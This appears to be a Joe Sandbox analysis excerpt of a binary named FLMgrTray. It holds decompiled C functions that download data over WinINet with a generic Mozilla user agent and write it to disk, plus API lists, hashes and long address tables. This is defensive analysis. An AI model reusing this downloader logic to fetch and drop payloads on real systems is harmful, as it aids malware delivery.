                                                                                        											if(_t304 < 0x1000) {
                                                                                        												L19:
                                                                                        												_push(_t304);
                                                                                        												E00175733(_t249, _t249); // executed
                                                                                        												_t335 = _t335 + 8;
                                                                                        												L21:
                                                                                        												 *_t257 = _v1192;
                                                                                        												goto L22;
                                                                                        											} else {
                                                                                        												_t306 =  *(_t249 - 4);
                                                                                        												_t268 = _t304 + 0x23;
                                                                                        												_t150 = _t249 - _t306 + 0xfffffffc;
                                                                                        												__eflags = _t249 - _t306 + 0xfffffffc - 0x1f;
                                                                                        												if(_t249 - _t306 + 0xfffffffc > 0x1f) {
                                                                                        													L29:
                                                                                        													__imp___invalid_parameter_noinfo_noreturn();
                                                                                        													L30:
                                                                                        													_push(_t306);
                                                                                        													E00175733(_t150, _t268);
                                                                                        													L31:
                                                                                        													 *[fs:0x0] = _v16;
                                                                                        													return E001755F4(_v20 ^ _t331);
                                                                                        												} else {
                                                                                        													_t249 = _t306;
                                                                                        													goto L19;
                                                                                        												}
                                                                                        											}
                                                                                        										}
                                                                                        									}
                                                                                        								} else {
                                                                                        									 *((intOrPtr*)(_t257 + 0x10)) = _t317 + _t322;
                                                                                        									_t253 = _t257;
                                                                                        									if(_t307 >= 0x10) {
                                                                                        										_t253 =  *_t257;
                                                                                        									}
                                                                                        									_t330 = _t322 + _t253;
                                                                                        									memmove(_t330,  &_v1044, _t317);
                                                                                        									_t335 = _t335 + 0xc;
                                                                                        									 *((char*)(_t330 + _t317)) = 0;
                                                                                        									L22:
                                                                                        									_push( &_v1196);
                                                                                        									_t244 = E00186EF0( &_v1180,  &_v1044, 0x400); // executed
                                                                                        									if(_t244 != 0) {
                                                                                        										continue;
                                                                                        									} else {
                                                                                        										goto L25;
                                                                                        									}
                                                                                        								}
                                                                                        								goto L74;
                                                                                        							}
                                                                                        							_v1181 = 1;
                                                                                        						}
                                                                                        						goto L25;
                                                                                        					}
                                                                                        				}
                                                                                        				L74:
                                                                                        			}























































































                                                                                        0x00183d83
                                                                                        0x00183d85
                                                                                        0x00183d90
                                                                                        0x00183d91
                                                                                        0x00183d97
                                                                                        0x00183d9c
                                                                                        0x00183d9e
                                                                                        0x00183da4
                                                                                        0x00183da8
                                                                                        0x00183dae
                                                                                        0x00183db7
                                                                                        0x00183dbe
                                                                                        0x00183dc5
                                                                                        0x00183dd6
                                                                                        0x00183de5
                                                                                        0x00183de9
                                                                                        0x00183df0
                                                                                        0x00184015
                                                                                        0x0018401b
                                                                                        0x00184020
                                                                                        0x00184026
                                                                                        0x00184028
                                                                                        0x0018402b
                                                                                        0x0018402c
                                                                                        0x00184034
                                                                                        0x00184036
                                                                                        0x00184039
                                                                                        0x00184044
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00184044
                                                                                        0x00000000
                                                                                        0x00184034
                                                                                        0x00000000
                                                                                        0x00183df6
                                                                                        0x00183dfc
                                                                                        0x00183e10
                                                                                        0x00183e20
                                                                                        0x00183e27
                                                                                        0x0018400a
                                                                                        0x00184010
                                                                                        0x00000000
                                                                                        0x00183e2d
                                                                                        0x00183e3b
                                                                                        0x00183e40
                                                                                        0x00183e43
                                                                                        0x00183e53
                                                                                        0x00183e60
                                                                                        0x00183e6d
                                                                                        0x00183e74
                                                                                        0x00183e7a
                                                                                        0x00183e80
                                                                                        0x00183e80
                                                                                        0x00183e88
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00183e8e
                                                                                        0x00183e93
                                                                                        0x00183e98
                                                                                        0x00183ea0
                                                                                        0x00183ed4
                                                                                        0x00183ed6
                                                                                        0x00184078
                                                                                        0x0018407d
                                                                                        0x0018407e
                                                                                        0x0018407f
                                                                                        0x00184080
                                                                                        0x00184081
                                                                                        0x00184083
                                                                                        0x00184085
                                                                                        0x00184090
                                                                                        0x00184091
                                                                                        0x00184097
                                                                                        0x0018409c
                                                                                        0x0018409e
                                                                                        0x001840a1
                                                                                        0x001840a2
                                                                                        0x001840a3
                                                                                        0x001840a4
                                                                                        0x001840a8
                                                                                        0x001840ae
                                                                                        0x001840b7
                                                                                        0x001840be
                                                                                        0x001840c0
                                                                                        0x001840c5
                                                                                        0x001840d1
                                                                                        0x001840de
                                                                                        0x001840e2
                                                                                        0x001840e7
                                                                                        0x001840e9
                                                                                        0x00184305
                                                                                        0x0018430b
                                                                                        0x00184310
                                                                                        0x00184313
                                                                                        0x00184316
                                                                                        0x00184318
                                                                                        0x0018431b
                                                                                        0x0018431c
                                                                                        0x0018431e
                                                                                        0x00184324
                                                                                        0x00184326
                                                                                        0x00184329
                                                                                        0x0018432e
                                                                                        0x00184331
                                                                                        0x00184334
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00184334
                                                                                        0x00000000
                                                                                        0x00184324
                                                                                        0x00000000
                                                                                        0x001840ef
                                                                                        0x001840ef
                                                                                        0x001840fc
                                                                                        0x00184100
                                                                                        0x00184108
                                                                                        0x00184118
                                                                                        0x0018411d
                                                                                        0x0018411f
                                                                                        0x001842fa
                                                                                        0x00184300
                                                                                        0x00000000
                                                                                        0x00184125
                                                                                        0x00184132
                                                                                        0x00184137
                                                                                        0x0018413a
                                                                                        0x0018414c
                                                                                        0x00184159
                                                                                        0x0018415e
                                                                                        0x00184160
                                                                                        0x00184166
                                                                                        0x00184170
                                                                                        0x00184170
                                                                                        0x00184176
                                                                                        0x00184178
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0018417e
                                                                                        0x00184183
                                                                                        0x00184188
                                                                                        0x0018418e
                                                                                        0x00184190
                                                                                        0x001841c4
                                                                                        0x001841c6
                                                                                        0x001843ac
                                                                                        0x001843b1
                                                                                        0x001843b2
                                                                                        0x001843b3
                                                                                        0x001843b4
                                                                                        0x001843b5
                                                                                        0x001843b6
                                                                                        0x001843b7
                                                                                        0x001843b8
                                                                                        0x001843b9
                                                                                        0x001843ba
                                                                                        0x001843bb
                                                                                        0x001843bc
                                                                                        0x001843bd
                                                                                        0x001843be
                                                                                        0x001843bf
                                                                                        0x001843c0
                                                                                        0x001843c3
                                                                                        0x001843c5
                                                                                        0x001843ca
                                                                                        0x001843d0
                                                                                        0x001843d2
                                                                                        0x001843e4
                                                                                        0x001843e6
                                                                                        0x001843ea
                                                                                        0x001843d4
                                                                                        0x001843d8
                                                                                        0x001843da
                                                                                        0x001843de
                                                                                        0x001843de
                                                                                        0x001841cc
                                                                                        0x001841cf
                                                                                        0x001841d2
                                                                                        0x001841d8
                                                                                        0x001841e5
                                                                                        0x001841f6
                                                                                        0x001841f8
                                                                                        0x00184207
                                                                                        0x00184209
                                                                                        0x0018420b
                                                                                        0x001841fa
                                                                                        0x001841fa
                                                                                        0x001841fa
                                                                                        0x001841da
                                                                                        0x001841da
                                                                                        0x001841da
                                                                                        0x0018420e
                                                                                        0x00184211
                                                                                        0x0018421a
                                                                                        0x0018421f
                                                                                        0x00184226
                                                                                        0x0018422b
                                                                                        0x00184231
                                                                                        0x0018423a
                                                                                        0x0018423d
                                                                                        0x0018423e
                                                                                        0x001842a3
                                                                                        0x001842a8
                                                                                        0x001842a8
                                                                                        0x001842b7
                                                                                        0x001842bc
                                                                                        0x001842bf
                                                                                        0x00000000
                                                                                        0x00184240
                                                                                        0x00184244
                                                                                        0x0018424a
                                                                                        0x0018424f
                                                                                        0x0018425e
                                                                                        0x00184269
                                                                                        0x0018426c
                                                                                        0x00184272
                                                                                        0x00184273
                                                                                        0x00184277
                                                                                        0x0018427d
                                                                                        0x00184295
                                                                                        0x00184295
                                                                                        0x00184297
                                                                                        0x0018429c
                                                                                        0x001842c3
                                                                                        0x001842c9
                                                                                        0x00000000
                                                                                        0x0018427f
                                                                                        0x0018427f
                                                                                        0x00184282
                                                                                        0x00184287
                                                                                        0x0018428a
                                                                                        0x0018428d
                                                                                        0x00184336
                                                                                        0x00184336
                                                                                        0x0018433c
                                                                                        0x0018433c
                                                                                        0x0018433e
                                                                                        0x00184343
                                                                                        0x00184346
                                                                                        0x00184346
                                                                                        0x00184349
                                                                                        0x00184350
                                                                                        0x00184357
                                                                                        0x0018435b
                                                                                        0x0018435e
                                                                                        0x00184360
                                                                                        0x00184363
                                                                                        0x00184364
                                                                                        0x00184366
                                                                                        0x0018436c
                                                                                        0x0018436e
                                                                                        0x00184371
                                                                                        0x00184376
                                                                                        0x00184379
                                                                                        0x0018437c
                                                                                        0x0018437e
                                                                                        0x0018437e
                                                                                        0x0018437c
                                                                                        0x00184384
                                                                                        0x00184386
                                                                                        0x0018438b
                                                                                        0x00184393
                                                                                        0x001843a1
                                                                                        0x001843ab
                                                                                        0x00184293
                                                                                        0x00184293
                                                                                        0x00000000
                                                                                        0x00184293
                                                                                        0x0018428d
                                                                                        0x0018427d
                                                                                        0x0018423e
                                                                                        0x00184192
                                                                                        0x00184195
                                                                                        0x00184198
                                                                                        0x0018419a
                                                                                        0x0018419d
                                                                                        0x0018419f
                                                                                        0x0018419f
                                                                                        0x001841a1
                                                                                        0x001841ac
                                                                                        0x001841b1
                                                                                        0x001841b4
                                                                                        0x001842cb
                                                                                        0x001842d1
                                                                                        0x001842e4
                                                                                        0x001842e9
                                                                                        0x001842eb
                                                                                        0x00000000
                                                                                        0x001842f1
                                                                                        0x001842f1
                                                                                        0x00000000
                                                                                        0x001842f1
                                                                                        0x001842eb
                                                                                        0x00000000
                                                                                        0x00184190
                                                                                        0x001842f5
                                                                                        0x001842f5
                                                                                        0x00000000
                                                                                        0x00184160
                                                                                        0x0018411f
                                                                                        0x00183edc
                                                                                        0x00183edf
                                                                                        0x00183ee2
                                                                                        0x00183ee8
                                                                                        0x00183ef5
                                                                                        0x00183f06
                                                                                        0x00183f08
                                                                                        0x00183f17
                                                                                        0x00183f19
                                                                                        0x00183f1b
                                                                                        0x00183f1b
                                                                                        0x00183f0a
                                                                                        0x00183f0a
                                                                                        0x00183f0a
                                                                                        0x00183eea
                                                                                        0x00183eea
                                                                                        0x00183eea
                                                                                        0x00183f1e
                                                                                        0x00183f21
                                                                                        0x00183f2a
                                                                                        0x00183f2f
                                                                                        0x00183f36
                                                                                        0x00183f3b
                                                                                        0x00183f41
                                                                                        0x00183f4a
                                                                                        0x00183f4d
                                                                                        0x00183f4e
                                                                                        0x00183fb3
                                                                                        0x00183fb8
                                                                                        0x00183fb8
                                                                                        0x00183fc7
                                                                                        0x00183fcc
                                                                                        0x00183fcf
                                                                                        0x00000000
                                                                                        0x00183f50
                                                                                        0x00183f54
                                                                                        0x00183f5a
                                                                                        0x00183f5f
                                                                                        0x00183f6e
                                                                                        0x00183f79
                                                                                        0x00183f7c
                                                                                        0x00183f82
                                                                                        0x00183f83
                                                                                        0x00183f87
                                                                                        0x00183f8d
                                                                                        0x00183fa5
                                                                                        0x00183fa5
                                                                                        0x00183fa7
                                                                                        0x00183fac
                                                                                        0x00183fd3
                                                                                        0x00183fd9
                                                                                        0x00000000
                                                                                        0x00183f8f
                                                                                        0x00183f8f
                                                                                        0x00183f92
                                                                                        0x00183f97
                                                                                        0x00183f9a
                                                                                        0x00183f9d
                                                                                        0x00184046
                                                                                        0x00184046
                                                                                        0x0018404c
                                                                                        0x0018404c
                                                                                        0x0018404e
                                                                                        0x00184056
                                                                                        0x0018405f
                                                                                        0x00184077
                                                                                        0x00183fa3
                                                                                        0x00183fa3
                                                                                        0x00000000
                                                                                        0x00183fa3
                                                                                        0x00183f9d
                                                                                        0x00183f8d
                                                                                        0x00183f4e
                                                                                        0x00183ea2
                                                                                        0x00183ea5
                                                                                        0x00183ea8
                                                                                        0x00183ead
                                                                                        0x00183eaf
                                                                                        0x00183eaf
                                                                                        0x00183eb1
                                                                                        0x00183ebc
                                                                                        0x00183ec1
                                                                                        0x00183ec4
                                                                                        0x00183fdb
                                                                                        0x00183fe1
                                                                                        0x00183ff4
                                                                                        0x00183ffb
                                                                                        0x00000000
                                                                                        0x00184001
                                                                                        0x00000000
                                                                                        0x00184001
                                                                                        0x00183ffb
                                                                                        0x00000000
                                                                                        0x00183ea0
                                                                                        0x00184003
                                                                                        0x00184003
                                                                                        0x00000000
                                                                                        0x00183e74
                                                                                        0x00183e27
                                                                                        0x00000000

                                                                                        APIs
                                                                                          • Part of subcall function 00185D80: memset.VCRUNTIME140(?,00000000,00000400,?,?,?,?,00183DEE,?,00000000,00000000,Mozilla/4.0 (compatible; ),2C80D730,?,?,013C1C88), ref: 00185DC0
                                                                                          • Part of subcall function 00185D80: memset.VCRUNTIME140(?,00000000,00000400,?,00000000,00000400,?,?,?,?,00183DEE,?,00000000,00000000,Mozilla/4.0 (compatible; ),2C80D730), ref: 00185DD3
                                                                                          • Part of subcall function 00185D80: memset.VCRUNTIME140(?,00000000,00000400,?,00000000,00000400,?,00000000,00000400,?,?,?,?,00183DEE,?,00000000), ref: 00185DE6
                                                                                          • Part of subcall function 00185D80: memset.VCRUNTIME140(?,00000000,00000400,?,00000000,00000400,?,00000000,00000400,?,00000000,00000400,?,?,?), ref: 00185DF9
                                                                                          • Part of subcall function 00185D80: memset.VCRUNTIME140(?,00000000,00000400,?,00000000,00000400,?,00000000,00000400,?,00000000,00000400,?,00000000,00000400,?), ref: 00185E0C
                                                                                          • Part of subcall function 00185D80: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,https,00000005,?,00000000,00000400,?,00000000,00000400,?,00000000,00000400,?,?,?), ref: 00185E62
                                                                                        • memset.VCRUNTIME140(?,00000000,00000400,?,00000000,00000000,?,00000000,00000000,Mozilla/4.0 (compatible; ),2C80D730,?,?,013C1C88), ref: 00183E3B
                                                                                          • Part of subcall function 00186EF0: InternetReadFile.WININET(?,00000400,?,00000000), ref: 00186F40
                                                                                        • memmove.VCRUNTIME140(00000000,?,00000000,?,00000400,00000000,?), ref: 00183EBC
                                                                                        • memcpy.VCRUNTIME140(00000000,?,00000000,?,?,00000400,00000000), ref: 00183F5A
                                                                                        • memcpy.VCRUNTIME140(013C1C88,?,00000000,00000000,?,00000000,?,?,00000400,00000000), ref: 00183F6E
                                                                                        • memcpy.VCRUNTIME140(00000000,?,00000000,?,?,00000400,00000000), ref: 00183FB3
                                                                                        • memcpy.VCRUNTIME140(013C1C88,?,00000000,00000000,?,00000000,?,?,00000400,00000000), ref: 00183FC7
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000000,Mozilla/4.0 (compatible; ),2C80D730,?,?,013C1C88), ref: 00184046
                                                                                        Strings
                                                                                        • Mozilla/4.0 (compatible; ), xrefs: 00183DD1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$memcpy$FileInternetRead_invalid_parameter_noinfo_noreturnmemmovestrncmp
                                                                                        • String ID: Mozilla/4.0 (compatible; )
                                                                                        • API String ID: 2707959651-1978366481
                                                                                        • Opcode ID: d2cabe10f99965df7897b14e64d2cb0d74d9886aec2ed8df4ef2380b7ae98510
                                                                                        • Instruction ID: 06965c12775a2c7493a5d67e0bcd3c2a844fef691970d36354258838c701c0d4
                                                                                        • Opcode Fuzzy Hash: d2cabe10f99965df7897b14e64d2cb0d74d9886aec2ed8df4ef2380b7ae98510
                                                                                        • Instruction Fuzzy Hash: A381C7B1A001199FCB24EF28CC81BEEB7B9EF56314F5405A9F61997281EB309B84CF55
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1452 183840-1838a7 call 183540 call 185d80 1457 1838ad-1838de call 186400 call 186500 1452->1457 1458 1839d1-1839e2 call 183690 1452->1458 1471 1838e4-183916 fopen_s 1457->1471 1472 1839c6-1839cc call 185d50 1457->1472 1464 183a12-183a2a 1458->1464 1465 1839e4-1839f0 1458->1465 1469 183a5a-183a76 call 1755f4 1464->1469 1470 183a2c-183a38 1464->1470 1467 183a08-183a0f call 175733 1465->1467 1468 1839f2-183a00 1465->1468 1467->1464 1468->1467 1474 183a02 _invalid_parameter_noinfo_noreturn 1468->1474 1476 183a3a-183a48 1470->1476 1477 183a50-183a57 call 175733 1470->1477 1481 183928-18396a memset call 186ef0 1471->1481 1482 183918-183923 call 185d50 1471->1482 1472->1458 1474->1467 1476->1477 1478 183a4a _invalid_parameter_noinfo_noreturn 1476->1478 1477->1469 1478->1477 1490 18396c 1481->1490 1491 1839b7-1839c3 fclose 1481->1491 1482->1458 1492 183972-18397a 1490->1492 1491->1472 1493 18397c-1839aa fwrite call 186ef0 1492->1493 1494 1839b5 1492->1494 1496 1839af-1839b1 1493->1496 1494->1491 1496->1492 1497 1839b3 1496->1497 1497->1491
                                                                                        C-Code - Quality: 51%
                                                                                        			E00183840(void* __eflags, char _a4, int _a20, intOrPtr _a24, char _a28, intOrPtr _a48) {
                                                                                        				int _v8;
                                                                                        				char _v16;
                                                                                        				signed int _v20;
                                                                                        				void _v1044;
                                                                                        				void* _v1072;
                                                                                        				char _v1092;
                                                                                        				char _v1180;
                                                                                        				struct _IO_FILE* _v1184;
                                                                                        				int _v1188;
                                                                                        				void* __ebp;
                                                                                        				signed int _t48;
                                                                                        				signed int _t49;
                                                                                        				intOrPtr _t58;
                                                                                        				intOrPtr _t61;
                                                                                        				int _t76;
                                                                                        				int _t78;
                                                                                        				int _t83;
                                                                                        				char _t95;
                                                                                        				char _t96;
                                                                                        				intOrPtr _t103;
                                                                                        				intOrPtr _t104;
                                                                                        				void* _t105;
                                                                                        				void* _t106;
                                                                                        				signed int _t110;
                                                                                        				void* _t111;
                                                                                        				void* _t112;
                                                                                        				void* _t114;
                                                                                        
                                                                                        				_push(0xffffffff);
                                                                                        				_push(E0018E51B);
                                                                                        				_push( *[fs:0x0]);
                                                                                        				_t112 = _t111 - 0x494;
                                                                                        				_t48 =  *0x19d05c; // 0x2c80d730
                                                                                        				_t49 = _t48 ^ _t110;
                                                                                        				_v20 = _t49;
                                                                                        				_push(_t49);
                                                                                        				 *[fs:0x0] =  &_v16;
                                                                                        				_v8 = 1;
                                                                                        				E00183540( &_v1180);
                                                                                        				_t53 =  >=  ? _a4 :  &_a4;
                                                                                        				_v8 = 2;
                                                                                        				if(E00185D80( &_v1180, _a24 - 0x10,  >=  ? _a4 :  &_a4, 0, 0, "Mozilla/4.0 (compatible; )") == 0) {
                                                                                        					L12:
                                                                                        					E00183690( &_v1180);
                                                                                        					_t103 = _a24;
                                                                                        					if(_t103 >= 0x10) {
                                                                                        						_t96 = _a4;
                                                                                        						_t106 = _t103 + 1;
                                                                                        						_t61 = _t96;
                                                                                        						if(_t106 >= 0x1000) {
                                                                                        							_t96 =  *((intOrPtr*)(_t96 - 4));
                                                                                        							_t106 = _t106 + 0x23;
                                                                                        							if(_t61 > 0x1f) {
                                                                                        								__imp___invalid_parameter_noinfo_noreturn();
                                                                                        							}
                                                                                        						}
                                                                                        						_push(_t106);
                                                                                        						E00175733(_t61, _t96);
                                                                                        						_t112 = _t112 + 8;
                                                                                        					}
                                                                                        					_t104 = _a48;
                                                                                        					_a20 = 0;
                                                                                        					_a24 = 0xf;
                                                                                        					_a4 = 0;
                                                                                        					if(_t104 >= 0x10) {
                                                                                        						_t95 = _a28;
                                                                                        						_t105 = _t104 + 1;
                                                                                        						_t58 = _t95;
                                                                                        						if(_t105 >= 0x1000) {
                                                                                        							_t95 =  *((intOrPtr*)(_t95 - 4));
                                                                                        							_t105 = _t105 + 0x23;
                                                                                        							if(_t58 > 0x1f) {
                                                                                        								__imp___invalid_parameter_noinfo_noreturn();
                                                                                        							}
                                                                                        						}
                                                                                        						_push(_t105);
                                                                                        						E00175733(_t58, _t95);
                                                                                        					}
                                                                                        					 *[fs:0x0] = _v16;
                                                                                        					return E001755F4(_v20 ^ _t110);
                                                                                        				}
                                                                                        				E00186400( &_v1180);
                                                                                        				_t66 =  >=  ? _v1092 :  &_v1092;
                                                                                        				if(E00186500( &_v1180,  >=  ? _v1092 :  &_v1092, 0, 0) == 0) {
                                                                                        					L11:
                                                                                        					E00185D50( &_v1180);
                                                                                        					goto L12;
                                                                                        				}
                                                                                        				_t70 =  >=  ? _a28 :  &_a28;
                                                                                        				_v1184 = 0;
                                                                                        				__imp__fopen_s( &_v1184,  >=  ? _a28 :  &_a28, "wb+"); // executed
                                                                                        				_t112 = _t112 + 0xc;
                                                                                        				if(_v1184 != 0) {
                                                                                        					memset( &_v1044, 0, 0x400);
                                                                                        					_t114 = _t112 + 0xc;
                                                                                        					_v1188 = 0;
                                                                                        					_push( &_v1188);
                                                                                        					_t76 = E00186EF0( &_v1180,  &_v1044, 0x400); // executed
                                                                                        					__eflags = _t76;
                                                                                        					if(_t76 == 0) {
                                                                                        						L10:
                                                                                        						fclose(_v1184); // executed
                                                                                        						_t112 = _t114 + 4;
                                                                                        						goto L11;
                                                                                        					}
                                                                                        					while(1) {
                                                                                        						_t78 = _v1188;
                                                                                        						__eflags = _t78;
                                                                                        						if(_t78 == 0) {
                                                                                        							break;
                                                                                        						}
                                                                                        						fwrite( &_v1044, _t78, 1, _v1184); // executed
                                                                                        						_t114 = _t114 + 0x10;
                                                                                        						_push( &_v1188);
                                                                                        						_t83 = E00186EF0( &_v1180,  &_v1044, 0x400); // executed
                                                                                        						__eflags = _t83;
                                                                                        						if(_t83 != 0) {
                                                                                        							continue;
                                                                                        						}
                                                                                        						goto L10;
                                                                                        					}
                                                                                        					goto L10;
                                                                                        				} else {
                                                                                        					E00185D50( &_v1180);
                                                                                        					goto L12;
                                                                                        				}
                                                                                        			}






























                                                                                        0x00183843
                                                                                        0x00183845
                                                                                        0x00183850
                                                                                        0x00183851
                                                                                        0x00183857
                                                                                        0x0018385c
                                                                                        0x0018385e
                                                                                        0x00183863
                                                                                        0x00183867
                                                                                        0x00183873
                                                                                        0x0018387c
                                                                                        0x0018388d
                                                                                        0x0018389c
                                                                                        0x001838a7
                                                                                        0x001839d1
                                                                                        0x001839d7
                                                                                        0x001839dc
                                                                                        0x001839e2
                                                                                        0x001839e4
                                                                                        0x001839e7
                                                                                        0x001839e8
                                                                                        0x001839f0
                                                                                        0x001839f2
                                                                                        0x001839f5
                                                                                        0x00183a00
                                                                                        0x00183a02
                                                                                        0x00183a02
                                                                                        0x00183a00
                                                                                        0x00183a08
                                                                                        0x00183a0a
                                                                                        0x00183a0f
                                                                                        0x00183a0f
                                                                                        0x00183a12
                                                                                        0x00183a15
                                                                                        0x00183a1c
                                                                                        0x00183a23
                                                                                        0x00183a2a
                                                                                        0x00183a2c
                                                                                        0x00183a2f
                                                                                        0x00183a30
                                                                                        0x00183a38
                                                                                        0x00183a3a
                                                                                        0x00183a3d
                                                                                        0x00183a48
                                                                                        0x00183a4a
                                                                                        0x00183a4a
                                                                                        0x00183a48
                                                                                        0x00183a50
                                                                                        0x00183a52
                                                                                        0x00183a57
                                                                                        0x00183a5f
                                                                                        0x00183a76
                                                                                        0x00183a76
                                                                                        0x001838b3
                                                                                        0x001838c7
                                                                                        0x001838de
                                                                                        0x001839c6
                                                                                        0x001839cc
                                                                                        0x00000000
                                                                                        0x001839cc
                                                                                        0x001838f0
                                                                                        0x001838fb
                                                                                        0x00183906
                                                                                        0x0018390c
                                                                                        0x00183916
                                                                                        0x00183936
                                                                                        0x0018393b
                                                                                        0x0018393e
                                                                                        0x00183956
                                                                                        0x00183963
                                                                                        0x00183968
                                                                                        0x0018396a
                                                                                        0x001839b7
                                                                                        0x001839bd
                                                                                        0x001839c3
                                                                                        0x00000000
                                                                                        0x001839c3
                                                                                        0x00183972
                                                                                        0x00183972
                                                                                        0x00183978
                                                                                        0x0018397a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0018398c
                                                                                        0x0018398e
                                                                                        0x0018399d
                                                                                        0x001839aa
                                                                                        0x001839af
                                                                                        0x001839b1
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x001839b3
                                                                                        0x00000000
                                                                                        0x00183918
                                                                                        0x0018391e
                                                                                        0x00000000
                                                                                        0x0018391e

                                                                                        APIs
                                                                                          • Part of subcall function 00185D80: memset.VCRUNTIME140(?,00000000,00000400,?,?,?,?,00183DEE,?,00000000,00000000,Mozilla/4.0 (compatible; ),2C80D730,?,?,013C1C88), ref: 00185DC0
                                                                                          • Part of subcall function 00185D80: memset.VCRUNTIME140(?,00000000,00000400,?,00000000,00000400,?,?,?,?,00183DEE,?,00000000,00000000,Mozilla/4.0 (compatible; ),2C80D730), ref: 00185DD3
                                                                                          • Part of subcall function 00185D80: memset.VCRUNTIME140(?,00000000,00000400,?,00000000,00000400,?,00000000,00000400,?,?,?,?,00183DEE,?,00000000), ref: 00185DE6
                                                                                          • Part of subcall function 00185D80: memset.VCRUNTIME140(?,00000000,00000400,?,00000000,00000400,?,00000000,00000400,?,00000000,00000400,?,?,?), ref: 00185DF9
                                                                                          • Part of subcall function 00185D80: memset.VCRUNTIME140(?,00000000,00000400,?,00000000,00000400,?,00000000,00000400,?,00000000,00000400,?,00000000,00000400,?), ref: 00185E0C
                                                                                          • Part of subcall function 00185D80: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,https,00000005,?,00000000,00000400,?,00000000,00000400,?,00000000,00000400,?,?,?), ref: 00185E62
                                                                                        • fopen_s.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,wb+,?,00000000,00000000,?,00000000,00000000,Mozilla/4.0 (compatible; ),2C80D730), ref: 00183906
                                                                                        • memset.VCRUNTIME140(?,00000000,00000400), ref: 00183936
                                                                                        • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000,00000001,00000000,?,00000400,00000000), ref: 0018398C
                                                                                        • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400,00000000), ref: 001839BD
                                                                                          • Part of subcall function 00185D50: InternetCloseHandle.WININET(?), ref: 00185D62
                                                                                          • Part of subcall function 00185D50: InternetCloseHandle.WININET(?), ref: 00185D6C
                                                                                          • Part of subcall function 00185D50: InternetCloseHandle.WININET(?), ref: 00185D76
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000000,Mozilla/4.0 (compatible; ),2C80D730), ref: 00183A02
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000000,Mozilla/4.0 (compatible; ),2C80D730), ref: 00183A4A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$CloseHandleInternet$_invalid_parameter_noinfo_noreturn$fclosefopen_sfwritestrncmp
                                                                                        • String ID: Mozilla/4.0 (compatible; )$wb+
                                                                                        • API String ID: 3413974208-2298157869
                                                                                        • Opcode ID: 0fc5bd588548f0a404ce047cc81302b9edaa9a137b3d8b0ac0c31423c87d0453
                                                                                        • Instruction ID: 85ab1acd8e3dab762e81b75c6f395ca061202027580961edefb6252cf893af0b
                                                                                        • Opcode Fuzzy Hash: 0fc5bd588548f0a404ce047cc81302b9edaa9a137b3d8b0ac0c31423c87d0453
                                                                                        • Instruction Fuzzy Hash: 1E51F2B1A001189BDF24EF24CC85BEE7379EB15708F4440A9FA19A7181EB749BC8CF54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
